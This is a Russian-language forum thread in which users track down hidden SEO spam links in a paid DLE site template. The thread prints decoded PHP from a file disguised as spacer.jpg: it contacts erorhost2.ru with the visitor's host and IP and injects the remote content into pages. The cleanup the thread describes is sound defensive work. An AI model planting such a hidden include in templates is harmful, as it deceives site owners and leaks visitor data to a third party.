Здравствуйте.

Установил новый шаблон ДЛЕ. Всё было нормально и вот спустя несколько дней перешёл в кэш (Сохранённую копию) Гугла и там увидел следующие ссылки:


1


Самое интересное, что я не вижу подобных ссылок. Смотрел код в разных браузерах, заходил через анонимные прокси - ничего нет!

Изучал файлы шаблона, вроде все коды в tpl - файлах стандартные для ДЛЕ, смотрел CSS, графические файлы... Не знаю на первый взгляд ничего скрытого в шаблоне нет.

В общем Гугл видит ссылки, а я нет.

Если кто знает, посоветуйте пожалуйста, что можно сделать в данной ситуации.

Шаблон пока поменял на старый.

Не нашел в выдаче. И не нашел в шабе твоем ничего.

DCrypt said:
Не нашел в выдаче. И не нашел в шабе твоем ничего.



Интересно, как ты узнал какой сайт его? Их тысячи

http://siteexplorer.search.yahoo.com/search?p=http://sn27.net/&fr=sfp&bwm=i

freeman22, для начала заюзай "Антивирус" в админке DLE.

попугай said:
Интересно, как ты узнал какой сайт его? Их тысячи


Мне чел дал шаблон+линк на его сайт.

Просмотри .js фаилы. Вполне возможно, что проиклудили его в шаблон, либо изменили существующий.

с примерно таким содержанием(*.js):


document.write('тут всё что угодно');


+ может быть криптован\зашифрован

Вот кэш этого шаблона, посмотрите там где логин есть цифра 1 и перед ней эти ссылки.


http://webcache.googleusercontent.com/search?q=cache:b51CKfYyfTsJ:/page/4/+&cd=4&hl=ru&ct=clnk&gl=ru


И посмотрите сейчас какой шаблон, там этих ссылок нет!

Кстати он не бесплатный покупал здесь http://plati.ru/asp/pay.asp?id_d=927804&searchstr=youporn.ru&agent=0

Если кто сможет разобраться, где зашили эти ссылки буду благодарен.

Но деле именно в шаблоне!!! Сейчас на сайте стоит другой шаблон и Гугл не показывает никаких ссылок скрытых!

Странно..я прочесал весь шаблон с начала и до конца. Никаких шифров вроде небыло.

в login.tpl


PHP:
$void= include ($tpl->dir.'/images/spacer.jpg');

инклюдит файл ./images/spacer.jpg

там


PHP:





Декодированный


PHP:
$x0b= @fsockopen("erorhost2.ru",80,$x0c,$x0d,6);

if(!$x0b){

return'';

}else{

$x0e= @file("http://erorhost2.ru/id2.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]");

returnimplode('',$x0e);

}




http://www.google.ru/search?sourceid=chrome&ie=UTF-8&q=erorhost2

попугай, большое спасибо!

Убрал в tpl строчку с инклудом и удалил spacer.jpg. Вернул шаблон, надеюсь ссылок этих больше в кэше Гугла не увижу.

P.S.Вот такую "заразу" можно и за деньги купить. Жалко, что на plati.ru претензии (с целью возврата средств) принимаются только в течении 3 дней с момента покупки товара.

Рано обрадовался.

Если просто зайти на сайт, не под админ-аккаунтом, то видна пустая страница, если вернуть $void = include ($tpl->dir.'/images/spacer.jpg'); , но при этом удалить spacer.jpg , то

Ну, естественно, удалить нужно было не одну строчку.

Вот готовый login.tpl http://pastebin.com/UfHPTxei

попугай Теперь работает. Ещё раз спасибо.

Платный шаблон еще и ссылками, в обще бес предел, такое еще в бесплатных не встречал, а в общем нужно тщательно проверять все файлы, много всяких уловок придумают, а потом удивляешься по чему взломали и или повесили табличку на сайт.